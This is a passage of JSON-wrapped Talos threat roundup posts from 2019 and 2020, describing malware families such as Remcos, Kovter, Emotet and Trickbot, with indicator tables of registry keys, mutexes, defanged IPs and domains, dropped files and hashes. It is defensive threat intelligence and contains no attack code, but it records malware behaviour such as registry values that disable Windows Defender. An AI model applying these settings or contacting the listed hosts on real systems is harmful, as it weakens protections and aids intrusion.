Asynchronous Process Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well. \nCorebot malware detected \\- (12) \nCorebot is a Trojan with many capabilities found in other prominent families. It features a plugin system to enable it to load a variety of features from the C&C server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as being able to intercept and modify browser communications and steal data, especially data related to banking. \nIcedID malware detected \\- (9) \nIcedID is a banking Trojan. It uses both web browser injection and browser redirection to steal banking and/or other financial credentials and data. The features and sophistication of IcedID demonstrate the malware author's knowledge and technical skill for this kind of fraud, and suggest the authors have previous experience creating banking Trojans. IcedID has been observed being installed by Emotet or Ursnif. Systems infected with IcedID should also be scanned for additional malware infections. \n \n", "cvss3": {}, "published": "2020-02-21T10:43:59", "type": "talosblog", "title": "Threat Roundup for February 14 to February 21", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-0708"], "modified": "2020-02-21T10:43:59", "id": "TALOSBLOG:C6C252288047D319ADE770A26A8DA196", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/4J1oPdwQFdU/threat-roundup-0214-0221.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-08T23:03:05", "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 1 and Nov. 8. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/blogs.cisco.com/2019/11/talos.tru_.json_.txt>) that includes the complete list of file hashes, as well as all other IOCs from this post. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \n \nThe most prevalent threats highlighted in this roundup are: \nThreat Name | Type | Description \n---|---|--- \nWin.Dropper.Remcos-7376444-0 | Dropper | Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam and capture screenshots. Remcos is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Dropper.Kovter-7376187-0 | Dropper | Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries that store its malicious code. Kovter is capable of reinfecting a system, even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware. \nWin.Dropper.Emotet-7375156-0 | Dropper | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Malware.Trickbot-7374019-1 | Malware | Trickbot is a banking trojan targeting sensitive information for select financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB Scripts. \nWin.Malware.Phorpiex-7373816-1 | Malware | Phorpiex is a trojan and worm that infects machines to deliver follow-on malware. Phorpiex has been known to drop a wide range of payloads, including malware that sends spam emails, ransomware and cryptocurrency miners. \nWin.Malware.Zbot-7373691-1 | Malware | Zbot, also known as Zeus, is trojan that steals information such as banking credentials using methods like key-logging and form-grabbing. \nWin.Malware.DarkComet-7371375-1 | Malware | DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system. \nWin.Packed.ZeroAccess-7370742-1 | Packed | ZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine and serves as a platform for conducting click-fraud campaigns. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Dropper.Remcos-7376444-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Snk ` | 8 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Snk ` | 8 \n`<HKCU>\\SOFTWARE\\XLR4615DFT-CRBSFT \nValue Name: exepath ` | 6 \n`<HKCU>\\SOFTWARE\\XLR4615DFT-CRBSFT \nValue Name: licence ` | 6 \nMutexes | Occurrences \n---|--- \n`Remcos_Mutex_Inj` | 8 \n`XLR4615DFT-CRBSFT` | 8 \n`Global\\0e3e6d21-fc20-11e9-a007-00501e3ae7b5` | 1 \n`Global\\96ab2081-00fe-11ea-a007-00501e3ae7b5` | 1 \n`Global\\d24f50c1-00fe-11ea-a007-00501e3ae7b5` | 1 \n`Global\\77238861-00fe-11ea-a007-00501e3ae7b5` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`179[.]33[.]68[.]255` | 4 \n`179[.]33[.]152[.]127` | 3 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`proyectobasevirtualcol[.]com` | 8 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\install.vbs` | 8 \n`%APPDATA%\\System32` | 8 \n`%APPDATA%\\System32\\Snk.exe` | 8 \n`%APPDATA%\\Runtime3` | 6 \n`%APPDATA%\\Runtime3\\1627.dat` | 6 \n`%TEMP%\\<random, matching '[a-z]{4,9}'>.exe` | 5 \n \n#### File Hashes\n\n` 01f18d1d2a28f1fa3df286d745ebe04521031af989db17818db42f6118417f60 1c74e101e6c49184a2766afafc33ab421900927ca39bfb8afc6e0c29c1d4bc4a 2993970ed0df750fb8ead03397e7d209d50c790ccea889f8cd3a57a3257d229a 2a0933719e5f6762061641d337324fe2b9778e13ac4785dfce00b10e3134a7de 3a725a79cc91e882a52237eda542e29d44734c64fce0edd924e1fee62e69bead 44a4d693d208abf527c5d286fdb45791d6bc97fbda6857f2d952a659a39f02fd 46eb980bd84f49f16aab9a9af815caedfffe92ddf0db272b330f6a9b625716cf 5752b25814c46d5084fa204ab381a18ebfb75fd0229ddac048fc673607ae52c1 622bb6dc7e751fc9352e7a23c9bc3ccd2e1855f6d5c37656516a54fe63ae6230 70ee3b93a10475214f534c162c6923ccdff92873709e2912ffd208ad12d447fb 7df44706454b41154f074f55a4bb5c42942a7e4a2dd244dd3d979dd28f81c602 99f7c0b78dac66e3fb5c571c466004e97ef6a75662ed2b1a7e49d17f85fa66f0 a6f8cd54dcd6a563c2195964cf1a65ce0d558ef753d0d9d25618cf5bb24332d9 b1b18b3fb4c4da002c4f8449042569a53be13971036b2b15bccb8a31392e8ce8 d78ec2e34df6a80321bac318055f095f49f244117f0307e3c59aa7326f834ca7 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-lUlJ35zN-xo/XcWVXsyC1cI/AAAAAAAAC5E/Ut3WMwK5dSA5gSyDbjjDmw78ps9feWz1ACLcBGAsYHQ/s1600/46eb980bd84f49f16aab9a9af815caedfffe92ddf0db272b330f6a9b625716cf_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Kovter-7376187-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE \nValue Name: DisableOSUpgrade ` | 25 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE\\OSUPGRADE \nValue Name: ReservationsAllowed ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ssishoff ` | 25 \n`<HKCR>\\.16A05D ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: vrxzdhbyv ` | 25 \n`<HKCU>\\SOFTWARE\\XVYG ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\XVYG ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\XVYG \nValue Name: tbqjcmuct ` | 25 \n`<HKCU>\\SOFTWARE\\XVYG \nValue Name: tbqjcmuct ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\XVYG \nValue Name: xedvpa ` | 25 \n`<HKCU>\\SOFTWARE\\XVYG \nValue Name: xedvpa ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\XVYG \nValue Name: svdjlvs ` | 25 \n`<HKCU>\\SOFTWARE\\XVYG \nValue Name: svdjlvs ` | 25 \n`<HKCR>\\7B507\\SHELL\\OPEN\\COMMAND ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\XVYG \nValue Name: lujyoqmfl ` | 25 \n`<HKCU>\\SOFTWARE\\XVYG \nValue Name: lujyoqmfl ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101 \nValue Name: CheckSetting ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103 \nValue Name: CheckSetting ` | 25 \n`<HKCU>\\SOFTWARE\\XVYG \nValue Name: tnzok ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\XVYG \nValue Name: tnzok ` | 25 \n`<HKCU>\\SOFTWARE\\XVYG \nValue Name: usukxpt ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\XVYG \nValue Name: usukxpt ` | 25 \n`<HKCU>\\SOFTWARE\\<random, matching '[a-zA-Z0-9]{5,9}'> ` | 21 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 7 \n`<HKCU>\\SOFTWARE\\YNRVKCYV3 \nValue Name: kwS6y5 ` | 1 \nMutexes | Occurrences \n---|--- \n`EA4EC370D1E573DA` | 25 \n`A83BAA13F950654C` | 25 \n`Global\\7A7146875A8CDE1E` | 25 \n`B3E8F6F86CDD9D8B` | 25 \n`408D8D94EC4F66FC` | 20 \n`Global\\350160F4882D1C98` | 20 \n`053C7D611BC8DF3A` | 20 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`48[.]35[.]9[.]231` | 2 \n`24[.]6[.]47[.]86` | 2 \n`53[.]51[.]100[.]34` | 2 \n`103[.]72[.]170[.]215` | 2 \n`100[.]65[.]74[.]134` | 2 \n`214[.]157[.]80[.]109` | 2 \n`53[.]189[.]39[.]167` | 2 \n`171[.]50[.]101[.]82` | 2 \n`186[.]88[.]125[.]16` | 2 \n`103[.]3[.]144[.]29` | 2 \n`191[.]63[.]106[.]220` | 2 \n`132[.]142[.]20[.]146` | 2 \n`185[.]144[.]48[.]120` | 2 \n`74[.]188[.]12[.]194` | 2 \n`151[.]185[.]129[.]250` | 2 \n`123[.]193[.]218[.]247` | 2 \n`7[.]184[.]47[.]209` | 2 \n`11[.]19[.]158[.]101` | 2 \n`89[.]73[.]101[.]218` | 2 \n`104[.]7[.]70[.]162` | 2 \n`111[.]104[.]240[.]101` | 2 \n`187[.]41[.]98[.]16` | 2 \n`39[.]158[.]228[.]212` | 2 \n`67[.]110[.]140[.]230` | 2 \n`87[.]88[.]172[.]42` | 2 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`cp[.]aliyun[.]com` | 2 \n`netcn[.]console[.]aliyun[.]com` | 2 \n`help[.]dreamhost[.]com` | 1 \n`api[.]w[.]org` | 1 \n`gmpg[.]org` | 1 \n`panel[.]dreamhost[.]com` | 1 \n`fonts[.]gstatic[.]com` | 1 \n`www[.]cloudflare[.]com` | 1 \n`httpd[.]apache[.]org` | 1 \n`www[.]dreamhost[.]com` | 1 \n`apps[.]digsigtrust[.]com` | 1 \n`apps[.]identrust[.]com` | 1 \n`cacerts[.]digicert[.]com` | 1 \n`www[.]wdos[.]net` | 1 \n`www[.]wddns[.]net` | 1 \n`www[.]wdcdn[.]com` | 1 \n`www[.]wdlinux[.]cn` | 1 \n`community[.]cambiumnetworks[.]com` | 1 \n`www[.]cambiumnetworks[.]com` | 1 \n`x[.]ss2[.]us` | 1 \n`www[.]wdcp[.]net` | 1 \n`docs[.]atlassian[.]com` | 1 \n`www[.]atlassian[.]com` | 1 \n`staging[.]theplaylist[.]net` | 1 \n`www[.]10dang[.]com` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%LOCALAPPDATA%\\39b03\\6a5cc.16a05d` | 25 \n`%LOCALAPPDATA%\\39b03\\7cbdf.bat` | 25 \n`%HOMEPATH%\\Local Settings\\Application Data\\2501\\1ffa.41d68` | 20 \n`%HOMEPATH%\\Local Settings\\Application Data\\2501\\aae7.bat` | 20 \n \n#### File Hashes\n\n` 07f6d9e83f537600594c31b3602732e673876773d011ad3827d3b4bfd90263b3 09decefe05efe8d4de76c83d2d25b3688a7aa8a5b64a66d9beda52f1cb84d3e1 1034ec321ee9aacbac4c6eb13c9b7c337ee203f7690c75b03be96f45e7131854 1b027ad776520157003006129c70ffcb5a6df709784553abffc39e231cc35ba4 32ef3ff9e7f8879fac649e0bd47c943c5c9ae41f92ee11223bcdf3e735fcdd4d 4bfd91dbacfc04dd91dd43c00209141b6b33b3ce7d7fce5a40a39190e1020044 535870f540ccf5fa55b7d45b46e12c7f6cca475d7d1ed53a825bf4a74a8deaad 568ed4d9b0ecc820f370f364a9135cb99fe5cc61b953156c8abf2d8b4455ea35 5dc8da99651c7a508063c24d05724b8ce59ad6ae5a7b71d3acf27aa9a46937e0 6159c80c21256280b87b9be98bce4ce08a62712a5472ce88ab91ec58a889a998 670d2eef908fdaccbad25d40f7fc35deaa8a27667c8ae9c64c3c8c3f7b47715f 699f6b25a4d720eec442dab827192c5c3089da861c3c891f08c327918e0034c3 6e99630d9605ab0cdd26b273edc288e70b9b927fbd10bb4c531bdbaedb832842 716ca25938088e90d7529d396391ea45971e7716244684b7e431b46fae5d2f88 72301c500af238cd544b8208e3c5ea02d562143ab58a4fc7d429fb6dbdb5433a 77e117c5483524cd6bf8dcfa0b072d93644f71f15931b8f65be912dd2d4e0ac3 7803321e0e650f836a0260bd38dcac456e0bf822bd7d9159a03f509700f274a9 78bff6ee1f123cf5394c52b22f8bf282258684dc065d6fb3a6f7f11bb0dbb44c 7f9c7a64e9d7e46b31d842401064701c4cbaeee2d231b80e5221bc9b6dcad91c 886db07fb244827ecebfb8a0c807fc418d4e75699fe59d0a33203b2cacc30e08 94107471babcc12730005b1e70af6f59559229a0d2d325c18f88e8990c54a73b 9c3bc6fffc73ce25bd3f178daf44625b1ee681c7593ceef31e76fb5a2387ecb5 9d5304e56d130aeef6505442550c7cf49e3710f2ab7f31a7dd7db4a151fc5862 9f8721f77785853fded20778388a436d3ddc74a5200265a95ce7e168318b5f6c a1885a9e550677d9bdfbfa79590d9025c006940e540a795ab3700d3e960dc3e0 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-rjQIKflw3Ps/XcWVue7XNUI/AAAAAAAAC5M/MC1Pi9yDJ7YkS4zpK1HN1vJkDa4lZ6h2ACLcBGAsYHQ/s1600/6159c80c21256280b87b9be98bce4ce08a62712a5472ce88ab91ec58a889a998_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Emotet-7375156-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS ` | 115 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: Type ` | 115 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: Start ` | 115 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: ErrorControl ` | 115 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: ImagePath ` | 115 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: DisplayName ` | 115 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: WOW64 ` | 115 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: ObjectName ` | 115 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: Description ` | 115 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 115 \n`Global\\M98B68E3C` | 115 \n`Global\\M3C28B0E4` | 42 \n`Global\\I3C28B0E4` | 42 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`173[.]194[.]68[.]108/31` | 74 \n`189[.]189[.]21[.]214` | 60 \n`17[.]36[.]205[.]74/31` | 59 \n`74[.]202[.]142[.]71` | 53 \n`185[.]94[.]252[.]27` | 50 \n`45[.]55[.]82[.]2` | 50 \n`37[.]187[.]5[.]82` | 50 \n`190[.]120[.]104[.]21` | 40 \n`172[.]217[.]10[.]83` | 38 \n`23[.]229[.]115[.]217` | 38 \n`74[.]202[.]142[.]33` | 37 \n`45[.]33[.]54[.]74` | 37 \n`54[.]38[.]94[.]197` | 33 \n`62[.]149[.]128[.]200/30` | 32 \n`74[.]202[.]142[.]98/31` | 29 \n`74[.]208[.]5[.]14/31` | 29 \n`172[.]217[.]3[.]115` | 28 \n`191[.]252[.]112[.]194/31` | 28 \n`74[.]208[.]5[.]2` | 27 \n`176[.]9[.]47[.]53` | 27 \n`196[.]43[.]2[.]142` | 27 \n`193[.]70[.]18[.]144` | 26 \n`220[.]194[.]24[.]10/31` | 25 \n`50[.]22[.]35[.]194` | 24 \n`173[.]201[.]192[.]229` | 22 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`smtpout[.]secureserver[.]net` | 69 \n`smtp[.]prodigy[.]net[.]mx` | 54 \n`smtp[.]alestraune[.]net[.]mx` | 37 \n`smtp[.]infinitummail[.]com` | 33 \n`secure[.]emailsrvr[.]com` | 32 \n`smtp[.]dsl[.]telkomsa[.]net` | 30 \n`imail[.]dahnaylogix[.]com` | 28 \n`smtp[.]orange[.]fr` | 28 \n`smtp[.]mail[.]com` | 27 \n`smtp[.]office365[.]com` | 26 \n`mail[.]cemcol[.]hn` | 25 \n`smtp[.]1and1[.]com` | 24 \n`smtp-mail[.]outlook[.]com` | 23 \n`smtp[.]mail[.]ru` | 22 \n`mail[.]aruba[.]it` | 21 \n`pop3s[.]aruba[.]it` | 21 \n`correo[.]puertotuxpan[.]com[.]mx` | 20 \n`smtp[.]zoho[.]com` | 19 \n`smtp[.]techcommwireless[.]com` | 19 \n`zmail2[.]tikona[.]co[.]in` | 19 \n`smtpout[.]asia[.]secureserver[.]net` | 18 \n`smtp[.]mail[.]me[.]com` | 18 \n`smtp[.]qiye[.]163[.]com` | 18 \n`mail[.]outlook[.]com` | 17 \n`smtp[.]aol[.]com` | 17 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%SystemRoot%\\SysWOW64\\spooleripspsb.exe` | 2 \n`\\TEMP\\694.exe` | 2 \n`%SystemRoot%\\SysWOW64\\spooleripspsa.exe` | 1 \n`\\TEMP\\L6WtzMgB.exe` | 1 \n`\\TEMP\\wdEnqutV.exe` | 1 \n`\\TEMP\\pzcc3lk.exe` | 1 \n`\\TEMP\\p1cvp.exe` | 1 \n`\\TEMP\\ux68b0c6lxc0fow.exe` | 1 \n`\\TEMP\\z825f3w9uh.exe` | 1 \n`\\TEMP\\gcb5of4v1tlz.exe` | 1 \n`\\TEMP\\ezxnt4.exe` | 1 \n`\\TEMP\\39v3vti54d.exe` | 1 \n`\\TEMP\\tdr3z0u10.exe` | 1 \n`\\TEMP\\yqr4645h3g.exe` | 1 \n`\\TEMP\\70vol09busiw7g.exe` | 1 \n`\\TEMP\\2bn1wg8bam49.exe` | 1 \n`\\TEMP\\afoly3.exe` | 1 \n`\\TEMP\\yumjilsuex5ce.exe` | 1 \n`\\TEMP\\2gb7kk6.exe` | 1 \n`\\TEMP\\f80gj19dm6pg.exe` | 1 \n`\\TEMP\\itb9yhf.exe` | 1 \n`\\TEMP\\sd0ew7kemxl.exe` | 1 \n`\\TEMP\\9b65hy6s.exe` | 1 \n`\\TEMP\\5q1otsijpw2d6rr.exe` | 1 \n`\\TEMP\\002109r7ga.exe` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 02fc8369a88b82e3f3071515dacd5d66dac4a7bbc30c0273ce94f1d1c17016c2 0358ed9153522829b222680b6308ca2bfbb9af02f7577527d290bd6b5a45741a 05813a34ed66ce894edfe1283dcbb4aac108a27a9d100cd1beda364c3a9a14d8 05cb5ec98746d64d138330942f339979762f3d9e2103176927e5298aab38b44d 068c95ddf6682151bfac5a348f3cdc83dd28dbb3636945893c40919e5c2529f6 06bee1b52d91c40d92e37313f5a41dd75ccfe06f4081c8d82cc150de85afa8fc 07ee440c02863990aa804fe41894616f5a660a07cea93bf9f4e21b379637cd04 08a60b24edee93c10a2f7f88f771cada9d5fdb220e236ac7685bc5467187cc7d 09b5cd03af0aeff661f64799a67a1e4b68fe95ed8c19f33b9f79c6ba891e1961 0aef359713281304cb60b92f7f9a4f046e7ae0902809830a306e683830c0621e 0cc6fb091ca3119744ef99cc1a75bf093351962ede75fe01d9689ad6e611eed7 10f54c55d5df2aba0a5f86addb10e2b6022040f9e30541e865e823456526d181 1360747298f09ad4a3231036c557fddae2e65e0544fa2bcd42847fd13793eeeb 15683fc25f400427b06f471235d0080d9b340760e1cf0e53b402cc3f92724904 179dcfe6679c7d9e7527dbc7280807c7abe2ab8b6cd74671ca3a240bdb9f9b13 197b6142da885afd536a49e192dd6259abdb324bd3a278850c74b54d3ad819a4 1ad1ff05930f27ef4b349c7a612235d1632ef7ceaa1a17adf7c7b3a97b40ca4d 1d92855b93ac6e841ca7afe057ceef7c6a52eb1aa511c47c523d25c7f542785b 2089c98c6d15a5c669795eea5a310ec83cbf7614be2aae5bc1ed1721e406360d 2175ae9fcf2321d5855a81146a650a9fe69d622a3d0303076fbfe32ddc645bd1 2275693f9a5b245d54030abaaa757f799c369df22b26cce4a8df84d1497b682b 23f18138a5aa4ff7284e25faa8490b14706170a7980b73a2cb69527fa19a9655 25da27f6d266e9986c93a48d93be82632fdfc607416d42e183c27b404591a808 26213f98dda98e08963a7a2934a6eadb665121a23aa14493cc45f5c6b23e7099 2a80f80c219f9554c9779e86c47a51a27858a767bb7b1c45b1d52055f6b9a30a `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-_R0i9VaZ4iA/XcWWBOk-xpI/AAAAAAAAC5U/KuSmcoHMEeIdwllhvRMx-bq15Mc9KAq5ACLcBGAsYHQ/s1600/7f8eeaddf5e3e649e6710cb5246056903d0ba87cfb38071af1ff578e87bd4a89_amp.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-P3LBFfzeJJs/XcWWFQS7ghI/AAAAAAAAC5Y/6uUrKObp4EE56kf91pzDRwq38IawApd6QCLcBGAsYHQ/s1600/55894b7c23326f3f24f0c8eb13077874cefac9d266d6392ac40bd93c144760f6_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Trickbot-7374019-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS DEFENDER \nValue Name: DisableAntiSpyware ` | 26 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: DeleteFlag ` | 26 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Start ` | 26 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS DEFENDER\\REAL-TIME PROTECTION \nValue Name: DisableBehaviorMonitoring ` | 26 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS DEFENDER\\REAL-TIME PROTECTION \nValue Name: DisableIOAVProtection ` | 26 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS DEFENDER ` | 26 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS DEFENDER\\REAL-TIME PROTECTION ` | 26 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS DEFENDER\\REAL-TIME PROTECTION \nValue Name: DisableOnAccessProtection ` | 26 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS DEFENDER\\REAL-TIME PROTECTION \nValue Name: DisableScanOnRealtimeEnable ` | 26 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 11 \nMutexes | Occurrences \n---|--- \n`Global\\316D1C7871E10` | 26 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`72[.]22[.]185[.]208` | 17 \n`72[.]22[.]185[.]200` | 9 \n`116[.]203[.]16[.]95` | 5 \n`216[.]239[.]32[.]21` | 4 \n`216[.]239[.]36[.]21` | 3 \n`82[.]146[.]46[.]153` | 3 \n`107[.]173[.]6[.]251` | 3 \n`78[.]155[.]207[.]139` | 3 \n`216[.]239[.]34[.]21` | 2 \n`176[.]58[.]123[.]25` | 2 \n`177[.]124[.]37[.]208` | 2 \n`201[.]184[.]69[.]50` | 2 \n`179[.]189[.]241[.]254` | 2 \n`36[.]66[.]115[.]180` | 2 \n`177[.]36[.]5[.]7` | 2 \n`185[.]86[.]150[.]130` | 2 \n`149[.]154[.]70[.]202` | 2 \n`195[.]123[.]246[.]188` | 2 \n`185[.]117[.]119[.]163` | 2 \n`172[.]217[.]12[.]179` | 1 \n`104[.]20[.]17[.]242` | 1 \n`185[.]248[.]87[.]88` | 1 \n`80[.]173[.]224[.]81` | 1 \n`103[.]122[.]33[.]58` | 1 \n`177[.]107[.]51[.]162` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ip[.]anysrc[.]net` | 5 \n`myexternalip[.]com` | 4 \n`ipecho[.]net` | 4 \n`api[.]ipify[.]org` | 4 \n`ident[.]me` | 2 \n`checkip[.]amazonaws[.]com` | 2 \n`www[.]myexternalip[.]com` | 1 \n`icanhazip[.]com` | 1 \n`api[.]ip[.]sb` | 1 \n`wtfismyip[.]com` | 1 \n`ipinfo[.]io` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\wnetwork\\settings.ini` | 26 \n`%System32%\\Tasks\\Windows Network` | 26 \n`%APPDATA%\\wnetwork` | 26 \n`%APPDATA%\\WNETWORK\\<original file name>.exe` | 26 \n \n#### File Hashes\n\n` 0997acfd174ab60400f87700683b13a8e30003187a1ac95f8e03e7ef42722ed0 16a4034a84ee8568cb2f8eb5dadabc4602c0a8e8868f73672d50dfbf1a7f4d58 1b4e99fdce2dd1e3fec9d2544d998991b7db608fc546f3fcd095116c74abf5a6 1d004310b4da6128d37fbbc500fd2edaaac340ad0c02a6d955bb865b6bbf5a36 22a575f49efea2455bba405158a36e037ffb74a54d19a3594b9b91496235b94a 33174b58598cbfad8263865a35541f8cb45fb8c6bfef793fe8cf959386a01f5d 3614608cb133bd6ee5c664d32a70a4f6daabd51c5aa3e8305481a2c8e8e5e050 3be01a7decf86e147148172f9fd49a1dddb0fc61fa19f1f513200bef005d5621 533fbff0ab14351994eda4fdbfd54521f69b26aea55f1f4cbdc0a766ea665475 63fc0be214ba24b78e8af0c3fcc739bc65f2c93f47f2c0fd5fc36fab7c3b1ee9 